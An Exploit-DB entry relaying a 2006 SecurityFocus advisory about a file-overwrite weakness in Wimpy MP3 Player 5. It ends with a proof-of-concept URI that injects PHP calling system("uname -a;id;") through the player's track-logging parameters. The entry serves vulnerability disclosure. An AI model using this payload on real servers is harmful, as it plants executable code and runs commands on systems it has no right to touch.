Wimpy MP3 Player 5 - Text File Overwrite

EDB-ID:

27244


Author:

ReZEN

Type:

remote


Platform:

Linux

Date:

2006-02-16


source: https://www.securityfocus.com/bid/16696/info

Wimpy MP3 is prone to a weakness that permits the overwriting of a text file with arbitrary attacker-supplied data.

Successful exploitation of this issue may aid an attacker in further attacks.

The following proof of concept URI is available:
http://www.example.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>